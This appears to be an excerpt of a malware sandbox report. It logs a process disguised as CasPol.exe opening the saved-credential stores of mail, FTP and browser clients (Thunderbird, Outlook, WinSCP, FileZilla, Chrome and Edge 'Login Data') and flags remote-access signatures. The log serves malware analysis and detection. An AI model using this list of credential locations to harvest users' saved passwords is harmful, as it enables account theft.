Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3292, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality

Source: Yara match File source: 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3292, type: MEMORYSTR